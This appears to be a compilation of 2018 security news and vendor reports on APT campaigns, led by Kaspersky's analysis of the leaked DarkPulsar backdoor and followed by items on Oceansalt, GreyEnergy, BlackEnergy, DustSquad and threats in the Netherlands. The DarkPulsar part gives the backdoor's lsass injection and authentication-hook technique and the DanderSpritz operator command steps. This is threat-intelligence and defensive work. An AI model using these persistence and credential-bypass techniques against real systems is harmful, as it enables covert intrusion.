- APT -
Last update 09.10.2017 12:41:24
Introduction List Kategorie Subcategory 0 1 2 3 4 5 6 7 8
DarkPulsar
20.10.2018 Kaspersky APT
In March 2017, the ShadowBrokers published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch.
DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims.
DanderSprit interface
Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. There are three files in the plugin set from the FuzzBunch framework:
%pluginName%-version.fb
This is the utility file of the framework. It duplicates the header from XML and includes the plugin’s ID.
%pluginName%-version.exe
This executable file is launched when FuZZbuNch receives the command to do so.
%pluginName%-version.xml
This configuration file describes the plugin’s input and output parameters – the parameter name, its type and description of what it’s responsible for; all of these can be shown in FuzzBunch as a prompt. This file also contributes a lot to the framework’s usability, as it supports the specification of default parameters.
One of the most interesting Fuzzbunch’s categories is called ImplantConfig and includes plugins designed to control the infected machines via an implant at the post-exploitation stage. DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ‘sipauth32.tsp’ that provides remote control, belonging to this category.
It supports the following commands:
Burn
RawShellcode
EDFStagedUpload
DisableSecurity
EnableSecurity
UpgradeImplant
PingPong
Burn, RawShellcode, UpgradeImplant, and PingPong remove the implant, run arbitrary code, upgrade the implant and check if the backdoor is installed on a remote machine, respectively. The purpose of the other commands is not that obvious and, to make it worse, the leaked framework contained only the administrative module to work with DarkPulsar’s backdoor, but not the backdoor itself.
While analyzing the administrative module, we noticed several constants that are used to encrypt the traffic between the C&C and the implant:
We thought that probably these constants should also appear in the backdoor, so we created a detection for them. Several months later we found our mysterious DarkPulsar backdoor. We later were able to find both 32- and 64-bit versions.
We found around 50 victims located in Russia, Iran and Egypt, typically infecting Windows 2003/2008 Server. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.
DarkPulsar technical highlights
The DarkPulsar implant is a dynamic library whose payload is implemented in exported functions. These functions can be grouped as follows:
Two nameless functions used to install the backdoor in the system.
Functions with names related to TSPI (Telephony Service Provider Interface) operations that ensure the backdoor is in the autorun list and launched automatically.
A function with a name related to SSPI (Security Support Provider Interface) operations. It implements the main malicious payload.
The implementations of the SSPI and TSPI interfaces are minimalistic: the functions that are exported by DarkPulsar have the same names as the interface functions; however, they include malicious code instead of the phone service.
The implant is installed in the system by the nameless exported function. The backdoor is launched by calling Secur32.AddSecurityPackage with administrator privileges with the path to its own library in the parameter, causing lsass.exe to load DarkPulsar as SSP/AP and to call its exported function SpLsaModeInitialize used by DarkPulsar to initialize the backdoor. In this way AddSecurityPackage is used to inject code into lsass.exe. It also adds its library name at HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers
This is loaded at start by the Telephony API (TapiSrv) launched alongside the Remote Access Connection Manager (RasMan) service, setting startup type as “Automatic”. When loading the telephony service provider’s library, TapiSrv calls TSPI_lineNegotiateTSPIVersion which contains the AddSecurityPackage call to make the inject into lsass.exe.
DarkPulsar implements its payload by installing hooks for the SpAcceptLsaModeContext – function responsible for authentication. Such injects are made in several system authentication packets within the process lsass.exe and allow Darkpulsar to control authentication process based on the following protocols:
Msv1_0.dll – for the NTLM protocol,
Kerberos.dll – for the Kerberos protocol,
Schannel.dll – for the TLS/SSL protocols,
Wdigest.dll – for the Digest protocol, and
Lsasrv.dll –for the Negotiate protocol.
After this, Darkpulsar gets ability to embed malware traffic into system protocols. Since this network activity takes place according to standard system charts, it will only be reflected in the System process – it uses the system ports reserved for the above protocols without hindering their normal operation.
Network traffic during successful connection to DarkPulsar implant
The second advantage of controlling authentication processes is ability to bypass entering a valid username and password for obtaining access to objects that require authentication such as processes list, remote registry, file system through SMB. After Darkpulsar’s DisableSecurity command is sent, backdoor’s hooks on the victim side will always returns in the SpAcceptLsaModeContext function that passed credentials are valid. Getting that, system will provide access to protected objects to client.
Working with DarkPulsar
Darkpulsar-1.1.0.exe is the administrative interface working under the principle of “one command – one launch”. The command to be executed must be specified either in the configuration file Darkpulsar-1.1.0.9.xml or as command line arguments, detailing at least:
whether the target machine uses a 32-bit or 64-bit system;
protocol (SMB, NBT, SSL, RDP protocols are supported) to deliver the command and port number
private RSA key to decrypt the session AES key
Darkpulsar-1.1.0 was not designed as a standalone program for managing infected machines. This utility is a plugin of the Fuzzbunch framework that can manage parameters and coordinate different components. Here is how DisableSecurity command in Fuzzbunch looks like:
Below is an example of Processlist after DisableSecurity, allowing to execute any plugin without valid credentials and operating via regular system functions (remote registry service):
DanderSpritz
DanderSpritz is the framework for controlling infected machines, different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar.
For DanderSpritz works for a larger range of backdoors, using PeedleCheap in the victim to enable operators launching plugins. PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines. Once a connection is established all DanderSpritz post-exploitation features become available.
This is how DarkPulsar in EDFStagedUpload mode provides the opportunity to infect the victim with a more functional implant: PCDllLauncher (Fuzzbunch’s plugin) deploys the PeddleCheap implant on the victim side, and DanderSpritz provides a user-friendly post-exploitation interface. Hence, the full name of PCDllLauncher is ‘PeddleCheap DLL Launcher’.
The complete DanderSpritz usage scheme with the plugin PeddleCheap via FuZZbuNch with the plugins DarkPulsar and PCDllLauncher consists of four steps:
Via FuZZbuNch, run command EDFStagedUpload to launch DarkPulsar.
In DanderSpritz, run command pc_prep (PeedelCheap Preparation) to prepare the payload and the library to be launched on the implant side.
In DanderSpritz, run command pc_old (which is the alias of command pc_listen -reuse -nolisten -key Default) – this sets it to wait for a socket from Pcdlllauncher.
Launch Pcdlllauncher via FuZZbuNch and specify the path to the payload that has been prepared with the command pc_prep in the ImplantFilename parameter.
DanderSpritz
File System plugin
Conclusions
The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools. Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.
The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attacking platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealthiness. The implementation of these capabilities, such as encapsulating its traffic into legitimate protocols and bypassing entering credentials to pass authentication, are highly professional.
Our product can completely remove the related to this attack malware.
Detecting malicious network activity
When EDFStagedUpload is executed in an infected machine, a permanent connection is established, which is why traffic via port 445 appears. A pair of bound sockets also appears in lsass.exe:
When DanderSpritz deploys PeddleCheap’s payload via the PcDllLauncher plugin, network activity increases dramatically:
When a connection to the infected machine is terminated, network activity ceases, and only traces of the two bound sockets in lsass.exe remain:
IOCs
implant – 96f10cfa6ba24c9ecd08aa6d37993fe4
File path – %SystemRoot%\System32\sipauth32.tsp
Registry – HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers
DarkPulsar FAQ
20.10.2018 Kaspersky APT
What’s it all about?
In March 2017, a group of hackers calling themselves “the Shadow Brokers” published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch. The Fuzzbunch framework contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. In pair, it is a very powerful platform for cyber-espionage.
How was this implant discovered?
We always analyze all leaks containing malicious software to provide the best detection. The same happened after the “Lost in Translation” leak was revealed. We noticed that this leak contained a tool in the “implants” category called DarkPulsar. We analyzed this tool and understood that it is not a backdoor itself, but the administrative part only. We also noticed some magic constants in this administrative module, and having created some special signatures based on them, were able to catch the implant itself.
What exactly can this implant be used for?
This implant supports 7 commands:
The most interesting are DisableSecurity and EnableSecurity.
Burn – for self-deletion.
RawShellcode – to execute arbitrary base-independent code.
EDFStageUpload – Exploit Development Framework Stage Upload. Step by step it deploys DanderSpritz payloads to the victim’s memory without touching the drive. After this command is executed, the administrator can send to the victim any of the multiple DanderSpritz commands. (View details in the technical part of this report)
DisableSecurity – for disabling NTLM protocol security. With help of this command, the malware administrator does not need to know a valid victim username and password to successfully pass authentication – the system will interpret any arbitrary pair as valid. (View details in the technical part of this report)
EnableSecurite – the opposite of DisableSecurity.
UpgradeImplant – for installing a new version of the backdoor.
PingPong – for test communication.
How many victims?
We found around 50 victims, but believe that the figure was much higher when the Fuzzbunch and DanderSpritz frameworks were actively used. We think so because of the DanderSpritz interface, which allows many victims to be managed at the same time. The second point proving this suggestion is that after stopping their cyber-espionage campaign, the malware owners often delete their malware from victim computers, so the 50 victims are very probably just ones that the attackers have simply forgotten.
Which countries?
All victims were located in Russia, Iran, and Egypt, and typically Windows 2003/2008 Server was infected. Targets were related to nuclear energy, telecommunications, IT, aerospace, and R&D
What about the attack duration? Does it last long?
DarkPulsar’s creators did not skimp on resources in developing such an advanced mechanism of persistence. They also included functionality to disable NTLM protocol security for bypassing the need to enter a valid username and password during authentication. This indicates that victims infected with DarkPulsar were the targets of a long-term espionage attack.
Is the attack still active?
We think that after the “Lost In Translation” leakage the espionage campaign was stopped, but that doesn’t mean that all computers are rid of this backdoor infection. We cured all our users. As for users without our protection, we have several tips on how to check whether your system is infected and how to cure it by yourself. Note that to exploit this backdoor on infected victims, the attackers need to know the private RSA key which pairs to the public key embedded in the backdoor. It means that no one except real DarkPulsar’s managers can exploit compromised systems.
How to protect against this threat?
We can detect this threat with different technologies.
However, the standard recommendations remain the same:
Keep your security products up to date
Do not turn security product components off
Keep your OS updated
Install all security patches asap
Use special traffic analysis tools and pay attention to all encrypted traffic
Do not use weak passwords or the same password for several endpoints
Use complex passwords
Do not allow remote connections to endpoints with administration rights
Do not allow domain administrators to be local administrators with the same credentials
Which proactive technologies do you have to protect users against such threats?
We use machine learning, cloud technologies, emulation, and behavioral analysis in combination with anti-exploit protection to provide the best proactive protection for our clients.
Who is behind this threat?
We never engage in attribution. Our purpose is to counteract all threats, regardless of their source or destination.
How was this implant used? Was it created for stealing money or just information?
We have not seen any techniques for stealing money in this implant, but it is worth keeping in mind that this implant can run any executable code, so its functionality can be increased significantly.
Attackers behind Operation Oceansalt reuse code from Chinese Comment Crew
20.10.2018 securityweek APT
Security researchers from McAfee have recently uncovered a cyber espionage campaign, tracked as Operation Oceansalt, targeting South Korea, the United States, and Canada.
The threat actors behind Operation Oceansalt are reusing malware previously associated with China-linked cyberespionage group APT1.
“McAfee Advanced Threat Research and Anti-Malware Operations teams have discovered another unknown data reconnaissance implant targeting Korean-speaking users.” reads the report.
“We have named this threat Operation Oceansalt based on its similarity to the earlier malware Seasalt, which is related to earlier Chinese hacking operations. Oceansalt reuses a portion of code from the Seasalt implant (circa 2010) that is linked to the Chinese hacking group Comment Crew. Oceansalt appears to have been part of an operation targeting South Korea, United States, and Canada in a well-focused attack.”
APT1 cyberespionage group, aka Comment Crew, was first discovered in 2013 by experts from Mandiant firm. The evidence collected by the security experts links APT1 to China’s 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department (Military Cover Designator 61398), experts believe the group has been active since 2006 and targeted hundreds of organizations in multiple industries.
According to McAfee, Operation Oceansalt was not conducted by APT1, attackers leverage the Oceansalt implant that borrows the code from the APT1 tool dubbed Seasalt.
Both malware uses similar command handler and index table, and exactly the same response codes associated with command execution.
“Oceansalt contains the following strings that are part of Seasalt:
Upfileer
Upfileok
Both implants have a high degree of similarity in code sharing and functions. A few of their commonalities follow.”
According to the researchers, the implant is only a first-stage component that allows operators to perform various actions on the infected systems and to downloads additional components.
Oceansalt implements a dozen commands, including extract drive information, send information about a specific file, execute a command line using WinExec(), delete file, create file, get information on the running processes, terminate process, create/operate/terminate reverse shell, and test receive and send capabilities.
At the time of the analysis, it was still unclear who is behind the campaign, the only certainty was that the attackers in someway have access to the APT1’s source code even if it was never publicly disclosed.
The Oceansalt implant was used in at least five campaigns and was customized to the specific targets.
In the first two waves of attacks, threat actors used spear-fishing emails with weaponized Korean-language Microsoft Excel documents to download the implant. In the third campaign hackers leveraged on weaponized Microsoft Word documents, while the remaining waves of attacks targeted a small number of entities outside of South Korea, including the U.S. and Canada.
The attackers used several command and control (C&C) servers, their analysis revealed the Operation Oceansalt campaign is active in Canada, Costa Rica, the United States, and the Philippines.
“Perhaps more important is the possible return of a previously dormant threat actor and, further, why should this campaign occur now? Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown.” McAfee concludes.
“However, one thing is certain. Threat actors have a wealth of code available to leverage new campaigns, as previous researchfrom the Advanced Threat Research team has revealed. In this case we see that collaboration not within a group but potentially with another threat actor—offering up considerably more malicious assets. ”
'GreyEnergy' Cyberspies Target Ukraine, Poland
19.10.2018 securityweek APT CyberSpy ICS
Over the past three years, ESET security researchers have been tracking a cyber-espionage group linked to the infamous BlackEnergy hackers.
BlackEnergy has been around since at least 2007, but rose to prominence in December 2015 when it caused a major blackout. The newly documented group, which ESET refers to as GreyEnergy, emerged around the same time.
Another group that emerged around the same time is TeleBots, which is said to have orchestrated the massive NotPetya outbreak last year. Recently, the security researchers managed to link the group to Industroyer, which is considered the most powerful modern malware targeting industrial control systems (ICS).
According to an ESET report published on Wednesday (PDF), the BlackEnergy threat actor evolved into two separate groups, namely TeleBots and GreyEnergy. The former is focused on launching cybersabotage attacks on Ukraine, through computer network attack (CNA) operations.
Over the past three years, GreyEnergy was observed being involved in attacks targeting entities in Ukraine and Poland, but mainly focused on cyber-espionage and reconnaissance. The group's operations have been aimed at energy sector, transportation, and other high-value targets.
The GreyEnergy malware features a modular architecture, meaning that its capabilities are dependent on the modules the operator chooses to deploy. These modules, however, include backdoor, file extraction, screenshot capturing, keylogging, password and credential stealing, and other functionality.
“We have not observed any modules that specifically target Industrial Control Systems software or devices. We have, however, observed that GreyEnergy operators have been strategically targeting ICS control workstations running SCADA software and servers,” Anton Cherepanov, a senior security researcher at ESET, reveals.
None of the malware’s modules, ESET says, is capable of affecting ICS, but its operators did use, on at least one occasion, a disk-wiping component to disrupt operating processes. One of the GreyEnergy samples was using a valid digital certificate likely stolen from Taiwanese company Advantech.
The actor is targeting organizations either through compromised self-hosted web services or via spear-phishing emails with malicious attachments.
The attackers would also deploy additional backdoors to the compromised web servers that are accessible from the Internet. The hackers favor PHP backdoors and use several layers of obfuscation and encryption to hide the malicious code.
The attachments of spear-phishing emails would first drop a lightweight first-stage backdoor dubbed GreyEnergy mini (and also known as FELIXROOT) to map the network and collect admin credentials using tools such as Nmap and Mimikatz.
The collected credentials are then used to deploy the main GreyEnergy malware, which requires administrator privileges. The backdoor is deployed on servers with high uptime and workstations used to control ICS environments. Additional software (proxies deployed on internal servers) is used to communicate with the command and control (C&C) server as stealthily as possible.
Written in C and compiled using Visual Studio, the GreyEnergy malware is usually deployed in two modes: in-memory-only mode, when no persistence is required, and using Service DLL persistence, to survive system reboots. The functionality of the malware is the same in both cases.
The GreyEnergy modules researchers have observed to date are meant to inject a PE binary into a remote process; collect information about the system and event logs; perform file system operations; grab screenshots; harvest key strokes; collect saved passwords from various applications; use Mimikatz to steal Windows credentials; use Plink to create SSH tunnels; and use 3proxy to create proxies.
The malware leverages Tor relay software when active, with the C&C infrastructure setup similar to that of BlackEnergy, TeleBots, and Industroyer. Furthermore, GreyEnergy and BlackEnergy have a similar design and a similar set of modules and features, although they are implemented differently.
Furthermore, ESET researchers discovered a worm that appears to be the predecessor of NotPetya, and which they call Moonraker Petya. The malware, which contains code that makes the computer unbootable, was deployed against a small number of organizations and has limited spreading capabilities.
Moonraker Petya shows a cooperation between TeleBots and GreyEnergy, or at least reveals they are sharing some ideas and code. The main difference between the two is that TeleBots focuses solely on Ukraine, while GreyEnergy operates outside the country’s borders as well.
“GreyEnergy is an important part of the arsenal of one of the most dangerous APT groups that has been terrorizing Ukraine for the past several years. We consider it to be the successor of the BlackEnergy toolkit. The main reasons for this conclusion are the similar malware design, specific choice of targeted victims, and modus operandi,” ESET concludes.
'Operation Oceansalt' Reuses Code from Chinese Group APT1
19.10.2018 securityweek APT
A recently observed cyber-espionage campaign targeting South Korea, the United States and Canada is reusing malicious code previously associated with state-sponsored Chinese group APT1, McAfee reports.
Exposed in a Mandiant report in 2013 and also known as Comment Crew, APT1 was thought to be a unit of China’s People’s Liberation Army (PLA) and was considered both one of the most persistent of China's cyber threat actors and highly prolific in terms of the quantity of information it had stolen.
The newly observed campaign is unlikely the work of APT1, which has remained silent ever since the Mandiant report half a decade ago. Previously, the group had launched cyber-attacks on more than 141 U.S. companies from 2006 to 2010.
Dubbed Oceansalt, the malware implant used in the new campaign shows code similarities with a tool employed by APT1, namely Seasalt. This means that the actor behind the new operation had direct access to Comment Crew’s source code, although it was never made public.
McAfee’s report (PDF) on Oceansalt doesn’t provide a clear answer on who is behind these attacks, but notes that the code overlap could suggest that another group had access to the original code, or that it is a case of code-sharing between actors. Of course, it could also be a “false flag” operation.
McAfee’s security researchers discovered that Oceansalt was launched in five attack waves adapted to the targets.
While the first two attacks were spearfishing-based and used malicious Korean-language Microsoft Excel documents to download the implant, the third switched to Microsoft Word documents instead. Waves four and five targeted a small number of entities outside of South Korea, including the U.S. and Canada.
During the attacks, the hackers used multiple command and control (C&C) servers, showing that the campaign is active in countries such as Canada, Costa Rica, the United States, and the Philippines.
Oceansalt and Seasalt, McAfee notes, not only contain two exact same strings (Upfileer and Upfileok), but also show similarities in command handler and index table, and execute their capabilities in the same way. Furthermore, both use the exact same response codes to indicate the success or failure of command execution.
Both implants use the same codes for drive and file reconnaissance, and for the creation of reverse-shells (which are based on cmd.exe). Unlike Seasalt, however, Oceansalt uses an encoding and decoding mechanism, and a hardcoded control server address, but employs no persistence method.
According to McAfee, evidence that suggests code-sharing between Oceansalt authors and Comment Crew include the different mechanism for getting the C&C IP addresses, as well as the lack of reverse-shell capability in some Oceansalt samples, the presence of debug strings in Oceansalt, and the presence of new functions in one Oceansalt variant.
The implant, the researchers reveal, packs a broad range of capabilities to capture data from the victims’ machines, but it is only a first-stage component, with additional stages downloaded through commands. The malware, however, provides operators with the ability to perform various actions on the system.
Oceansalt includes support for a dozen commands: extract drive information, send information about a specific file, execute a command line using WinExec(), delete file, create file, get information on the running processes, terminate process, create/operate/terminate reverse shell, and test receive and send capabilities.
“Our research shows that Comment Crew’s malware in part lives on in different forms employed by another advanced persistent threat group operating primarily against South Korea. This research represents how threat actors including nation-states might collaborate on their campaigns,” McAfee concludes.
Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies
17.10.2018 securityaffairs APT BigBrothers
The Security Service of Ukraine (SBU) uncovered a new targeted attack launched by BlackEnergy APT on the IT systems of Ukrainian government entities.
The Security Service of Ukraine (SBU) uncovered a new targeted attack on the information and telecommunication systems of Ukrainian government entities.
The SBU attributed the attack to the BlackEnergy Russia-linked APT group.
“The Security Service of Ukraine has received more evidence of the aggressive actions of Russian intelligence services against Ukraine in cyberspace using a controlled hacker group responsible for carrying out cyberattacks on Ukraine’s critical infrastructure facilities during 2015-2017, known as BlackEnergy and NotPetya,” reads the SBU’s press release.
BlackEnergy made the headlines as the responsible for the massive power outage that occurred in Ukraine in December 2015.
The BlackEnergy malware is a threat improved to target SCADA systems, some variants include the KillDisk component developed to wipe the disks and make systems inoperable.
According to the SBU, BlackEnergy hackers used new samples of malware in a recent series of attack. The new malicious code act as surveillance software, they implement surveillance capabilities and remote administration features.
SBU along with experts from a well-known antivirus company determined that the malware involved in the attack are updated versions of the Industroyer backdoor.
The specialists involved in the investigation helped the Ukraine SBU to attribute the attack and implement mitigations to protect the IT infrastructure of government agencies.
The malware used in the recent attacks borrows the code from the Industroyer as reported by the ukrinform.net. website
“They have a number of similar characteristics, in particular using similar code snippets, computing capabilities of infected systems, etc.” states the ukrinform.net.
Experts from the SBU also observed attackers using hacking tools that were used by the BlackEnergy hackers in previous attacks.
Russia-linked APT group DustSquad targets diplomatic entities in Central Asia
17.10.2018 securityaffairs APT
Kaspersky experts published a detailed analysis of the attacks conducted by the Russian-linked cyber espionage group DustSquad.
Earlier October, security experts from ESET shared details about the operations of a cyber espionage group tracked as Nomadic Octopus, a threat actor focused on diplomatic entities in Central Asia.
The group has been active since at least 2015, ESET researchers presented their findings at the Virus Bulletin conference.
“ESET researchers recently discovered an interesting cyber espionage campaign active in several countries of Central Asia. We attribute these attacks to a previously undocumented APT group that we have named Nomadic Octopus.” states the blog post published by Virus Bulletin.
“Our findings suggest that this APT group has been active since at least 2015. The main goal of Nomadic Octopus appears to be cyber espionage against high-value targets, including diplomatic missions in the region”
The experts presented their findings at the Virus Bulletin conference.
Now Kaspersky experts published a detailed analysis of the attacks conducted by the group, tracked by the Russian firm as DustSquad, and the tools they used.
Kaspersky is monitoring the activity of the group for the last two years, DustSquad is a Russian-language cyberespionage group particularly active in Central Asian.
“For the last two years we have been monitoring a Russian-language cyberespionage actor that focuses on Central Asian users and diplomatic entities. We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware.” states the analysis published by Kaspersky Lab.
“The name was originally coined by ESET in 2017 after the 0ct0pus3.php script used by the actor on their old C2 servers. We also started monitoring the malware and, using Kaspersky Attribution Engine based on similarity algorithms, discovered that Octopus is related to DustSquad, something we reported in April 2018. “
The group targeted the victims with spear-phishing emails, the threat actors use Russian malware filenames.
Kaspersky tracked a campaign conducted by the group back to 2014 when hackers targeted entities in the former Soviet republics of Central Asia, plus Afghanistan.
In April 2018, the researchers discovered a new Octopus sample developed to target Windows systems, the malicious code had been disguised as a Russian version of the Telegram app used by the Democratic Choice (DVK) opposition party in Kazakhstan.
Attackers attempted to exploit the threaten of the Kazakhstan government to block Telegram over its use by the DVK.
The Octopus Trojan is written in Delphi, the same programming language used by Russian-linked APT group Sofacy for the development of the Zebrocy backdoor.
The malicious code backdoor features, including the ability to execute commands, upload and download files, take screenshots, and finding *.rar archives on the host.
Experts noticed that even if they found malware used by both DustSquad and Sofacy APT on the compromised machines, the two cyber espionage groups are not linked.
Kaspersky pointed out that many components of the Octopus malware are still unfinished, likely attackers created the malicious code in a hurry and not implemented certain features such as communication functionalities.
“Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware),” continues the Kaspersky report.
“Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally.”
Additional technical details are reported in the analysis, including IoCs.
Threats in the Netherlands
13.1.0218 Kaspersky APT
Advanced threat actors and other malicious cyber activity
Introduction
On October 4, 2018, the MIVD held a press conference about an intercepted cyberattack on the OPWC in the Netherlands, allegedly by the advanced threat actor Sofacy (also known as APT28 or Fancy Bear, among others). According to the MIVD, four suspects were caught red handed trying to break into the OPWC’s network. Sofacy activity in the Netherlands did not come as a surprise to us, since we have seen signs of its presence in that country before. However, aside from Sofacy we haven’t seen many other advanced persistent threat (APT) groups in the Netherlands, at least when compared to other areas, such as the Middle-East. Upon further reflection, we have concluded that this is rather odd. There are quite a few big multinationals and some high tech companies located in the Netherlands. In addition, there are other potential strategic targets for threat actors. So we decided to review cyber-threat activity targeting or affecting the Netherlands.
Providing an overview of one APT’s activity can be quite difficult, let alone all the APT activity affecting a country. First, we only see what we can see. That means we can only gather data from sources we have access to, such as that shared voluntarily by our customers with Kaspersky Security Network (KSN), and those sources also need to be supplied with data related to a specific APT. As a result, like any other cybersecurity vendor, our telemetry is naturally incomplete.
One way to improve our overview is to use sinkhole data. When a domain that is used by an APT expires, researchers can register that domain and direct the traffic to a sinkhole server. This is done quite frequently. For many of the APTs we track, we sinkhole at least one domain. In comparison to other sources, such as KSN and multi-scanner services, sinkhole data has a number of advantages. For example, in some cases you can get a better overview of the victimology of the APT. The drawback is that we need to filter the results, since there can be quite a few false positives (e.g. because other researchers are investigating the malware). This filtering can be quite cumbersome, because if we base it solely on the IP and the requests, it is quite difficult to come to a verdict.
Methodology
For this blogpost we gathered all the sinkhole data for Dutch IPs in the last four years (September 2014 to September 2018), which amounts to around 85,000 entries. Of course, this is far too much to verify by hand, so the first step was to filter the results, and especially all the scanners. While some of these were relatively easy to spot and filter out (e.g. all the TOR exit nodes, all the Romanian.anti-sec), others required a bit more effort.
In order to filter out the scanners, we deleted all entries where the IP matched more than four “tags” (each tag stands for a different campaign). After doing this, we were left with around 11,000. That meant 77% fewer results, but there were still too many, so we applied some more aggressive filtering.
The table below describes the number of tags that were hit per IP.
0 10,532
1 1,149
2 618
3 344
4 234
>4 938
One way to determine whether a hit in the sinkhole database is a true positive (TP) or a false positive (FP), is to find out who the victim is. We thus reversed the IP and checked whether, at the time of the first entry in our sinkhole database, the DNS entry matched the entries in our passive DNS database. If this was not the case, the entry was ignored. The next step was to remove all the entries that would be difficult to investigate (e.g. IP addresses that belong to an ADSL connection). Even though this method was quite rigid and meant that some TPs might be missed, we still decided to use it, since we knew it would be too resource-intensive to investigate all the entries. The result: only around 1,000 entries remained for investigation.
The aim of this blogpost is to give an overview of which APT groups are active in the Netherlands and what they are interested in, and that requires TPs, not FPs. For each remaining entry, a reverse DNS lookup was made, and the ASN information was saved. This was checked against our passive DNS database to see whether this IP had the same domain as its first entry in the sinkhole database. If it did, the entry was kept, if it was not, we tried to find out to which organization the IP belonged.
At this point, for the entries that remained, the raw requests were retrieved against the template request made by the APT. Finally, for each of the IPs left on our list, we tried to tie them to a company or institution. If this was the case, the entry was kept and marked as a TP.
We also checked our APT reports for targets in the Netherlands and added these results to the review.
Results
Using the methods described above, we found the following APTs that are or have been active in the Netherlands:
BlackOasis
BlackOasis is an APT group we have been tracking since May 2016. It uses the commercially available FinFisher malware made by Gamma International and sold to law enforcement agencies (LEAs) and nation states. BlackOasis differentiates itself from other APT-groups by using a vast amount of 0-days: at least five since 2015. Victims are mostly found in Middle Eastern countries, where the group is particularly interested in politics. We have also seen it targeting members of the United Nations and regional news correspondents. Recently we have seen a shift in focus towards other countries such as Russia, the UK and now also the Netherlands. Its Dutch victims fit into its shift of interest.
Sofacy
Sofacy, also known as Pawn Storm, Fancy Bear and many other names is an active APT group that we have followed since 2011. It is known for using spear phishing emails to infect targets and for the active deployment of 0-days. In 2015, Trend Micro researchers reported that the group had targeted the MH17 investigation team. Last year, the Volkskrant published an article alleging it tried to infect several Dutch Ministries. Then there is the October 4, 2018 news of four alleged Sofacy members having been caught in April 2018 trying to hack the OPWC. Even though we cannot confirm these last two incidents, since we are not involved, we have observed several targets in the Netherlands infected with Sofacy. Interestingly, we observe fewer deployments of Xagent (one of Sofacy’s modules) after April 2018. Although one new Xagent deployment was noted in August 2018, it seems that the group pushed fewer, and then only new, deployments from April through June 2018.
Hades
Hades is the name given to the group held responsible for the Olympic Destroyer malware that was found targeting the 2018 Winter Olympic Games in South Korea. Our initial thought was that the malware was related to the Lazarus group, because several of our Yara rules had 100% matches with the malware. However, after careful research we found many false flags that pointed to different APT groups. A few months later, in May 2018 (not long after the OPWC incident took place), we found that Hades had returned and was now targeting financial institutions and chemical threat prevention laboratories. Given this shift of interest, it is no surprise that entities in the Netherlands were targeted as well.
Buhtrap
Buhtrap is one of the groups that targets financial institutions with the ultimate goal of stealing money. Its tools, techniques and processes (TTPs) don’t differ extensively from those of traditional APT groups. Buhtrap is one of those (Carbanak and Tyupkin are others) that started by infecting financial institutions in Russia and Ukraine, but after a while shifted its focus to other parts of the world. We found Buhtrap activity in the Netherlands in 2017.
The Lamberts
In March 2017, WikiLeaks published online a series of documents that they call “Vault 7”. Some of these documents feature malware that resembles that used by the Lamberts, a toolkit that has been used for several years, with most of its activity occurring in 2013 and 2014. One of The Lamberts’ variants we have been investigating is the “Green Lamberts”. We were surprised to see quite a few infections in the Netherlands, when the majority of attacks target Iran. We do not have any insight into the profile of the victims located in the Netherlands. Nevertheless, the fact that Lamberts is active in the Netherlands shows a possible shift in focus, and reminds us that for APT groups, borders do not exist.
Turla
Turla, also known as Uroboros, is a very active APT group, believed to be connected to many high-profile incidents such as the US Central Command attack in 2008 and the breach of RUAG (a Swiss military contractor). Other Turla targets include ministries and governmental organizations. Given all this, the Netherlands is a logical target for the Turla group. In fact, we would have been surprised not to have found any Turla infections in the Netherlands.
Gatak
Gatak, which also goes by the names of Stegoloader and GOLD, is a group that engages in data theft using watering hole attacks. It has been active since at least 2015, and its main interest is in intellectual property. Even though the use of watering hole attacks means the group does not have full control over who it infects, it has been able to hit a couple of high profile targets. In this case, our sinkhole database enabled us to determine that one of those was a high profile target in the Netherlands.
Putter Panda
In 2015, the Dutch chip maker, ASML was allegedly breached by Putter Panda. ASML acknowledged the breach and stated that one file was stolen. No further details are publicly available, although there was an episode of the TV program “KRO reporter“, partially dedicated to the breach. ASML is one of relatively few high-tech companies in the Netherlands. The fact that it has been breached is a clear sign that foreign threat actors are aware of and interested in industrial espionage in the Netherlands.
Animal Farm
Animal Farm is a group that has been active since at least 2009. A relatively advanced threat actor, it has been targeting a variety of organizations over the past years. Victims include governmental organizations, military contractors, activists and journalists. Even though the group is mainly focused on French speaking countries, we still found a few infections in the Netherlands.
Conclusion
Although our visibility of threat actor activity in the Netherlands is incomplete, the results are nevertheless surprising. Some groups we did not expect to see appear to be active in the country (such as the Lamberts). However, upon further thought, and especially when looking at potential targets located in the Netherlands and comparing this with the interests of some of the APT groups, their activity in the Netherlands makes sense.
The presence of both expected and unexpected threat actors is a good argument for organizations staying informed of the latest developments in cyberspace, particularly through threat intelligence reports. Because if you know what APT groups are up to, which organisations they target and what TTPs they use, you can implement the protection you need to stay one step ahead of them.
